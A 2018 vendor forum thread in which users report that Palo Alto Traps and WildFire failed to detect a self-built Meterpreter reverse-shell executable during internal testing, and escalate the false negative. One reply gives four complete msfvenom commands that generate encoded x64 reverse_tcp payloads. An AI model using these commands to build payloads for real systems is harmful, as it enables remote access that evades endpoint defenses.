05-02-2018 04:28 AM - edited 05-02-2018 06:12 AM
Ladies & Gents,
I created a x64 payload.exe (internal testing) this payload creates a reverse_tcp on port 4444. So I uploaded my 'payload.exe' to my test machine with Traps 4.1.3 (39-2454 Content).
Thinking, Traps will shut this down, to my horror it just let it run, in fact Windows Smart Filter triggered at first and let me click on proceed. Which I did and in a few seconds I had a meterpreter session running on my Kali box.
So my concern is why didn't Traps pick up on this? I also uploaded to WF which said it was a benign file, how can a file that opens up a reserve shell be cosnidered benign?
I am not no coder just used the standard tools in Kali, which means if I can anyone can.
Really worrying that Traps let this through 😞
05-02-2018 05:41 AM
I too have had concerns around similar items, as in "wtf, seriously" moments. I know that doesn't help you but just sayin' I share your concern.
05-02-2018 06:15 AM - edited 05-02-2018 06:16 AM
Yep I'm with you.
Biggest concern I have flagged this in WF as the wrong result, and left a message. It would be nice if someone from PA came back and said, yep we have this info and we are working on this or 'OMG you are right, nice spot'
I'm starting to think my over confidence in Traps was misplaced.
05-02-2018 09:54 AM
What was the hash on the file?
05-04-2018 05:29 AM
05-04-2018 05:45 AM
But I can recreate the file and a new hash will be created, so I see that as not a benefit. I would of thought as this is exhibiting certain behaviours that Traps or WF would have picked it out as Traps is supposed to be behavourial not hash look ups.
So effectively I could recreate the file 1000 times with same behaviour all with different hashes, but the behaviour would still not picked up.
I would like someone from PA comment on this because I am seriously worried, I know the NGFW will stop the traffic on port 4444 with I am sure with clever thinking that could be bypassed, but the conversation is about Traps stopping odd behaviour before it becomes something else.
PA any comments?
05-04-2018 10:47 AM
Which options or payload are you using? I'm getting local analysis detections for:
msfvenom -f exe-only -a x64 --platform windows -p windows/x64/shell/reverse_tcp lhost=192.168.1.101 lport=4444 > /tmp/tcp_reverse_4444.exe
msfvenom -f exe-only -a x64 --platform windows -e x64/xor -i 42 -p windows/x64/shell/reverse_tcp lhost=192.168.1.101 lport=4444 > /tmp/tcp_reverse_4444_encode_xor.exe
msfvenom -f exe-only -a x64 --platform windows -e x64/xor -i 42 -p windows/x64/powershell_reverse_tcp lhost=192.168.1.101 lport=4444 > /tmp/tcp_reverse_4444_encode_xor_2.exe
msfvenom -f exe-only -a x64 --platform windows -p windows/x64/powershell_reverse_tcp lhost=192.168.1.101 lport=4444 > /tmp/tcp_reverse_4444_2.exe
05-10-2018 03:21 AM
I used a script called 'hacktheworld' installed into Kali, it makes the payload and BOOM!
But I have done a test again this morning with a new payload and Traps ignored it again and smart screen popped up!!
Please have a go with the script in the video and see how you get on, its quite scary.
05-10-2018 03:44 AM
I ran the payload and it connected to my MSF Exploit running on Kali!
And Traps just ignores it... I wish someone from PA would look into this and maje a comment. I know that the payload is effectively just opening up a session its behaviour is malcious or beyond the normal.
As you can see it fails and marks this as benign, which if I flag this as a false positive they will mark this as Maware...
05-10-2018 07:57 AM
@BizBo, I have notified someone in the traps group about this, but in the meantime, have you contacted support at all about this? Let them know about this as a False Negative? This would be my first recommendation, as I do not know why it isn't catching on this, but we need to find out why and help fix it.
05-10-2018 01:20 PM
Hello Sir, I have watched many of your vids on youtube greatwork by the way.
Yes, I raised it with our support partner who have passed this onto PA. Interestingly I have tried this payload on on an PC running Sophos InterceptX and this also misses the payload.
I have given the details of my findings to our support to pass onto PA.
Thank you for reaching out to me, I want to get PA on this but its always difficult in being heard. Let me kow if you need more info.
06-09-2018 03:08 AM
Just an update:
PA have reported that the file is self encyprted which is making it hard for WF to detect, PA are looking into soltuons on WF.
However, Traps the jury is still out, its going very slowly. I will report back once PA have something. But I can create many new payloads and Traps still ignores them...albeit the outgoing network traffic would be shutdown subject to your configs on your PA, but it is still passing Traps 😞
Click Accept as Solution to acknowledge that the answer to your question has been provided.
The button appears next to the replies on topics you’ve started. The member who gave the solution and all future visitors to this topic will appreciate it!
These simple actions take just seconds of your time, but go a long way in showing appreciation for community members and the LIVEcommunity as a whole!
The LIVEcommunity thanks you for your participation!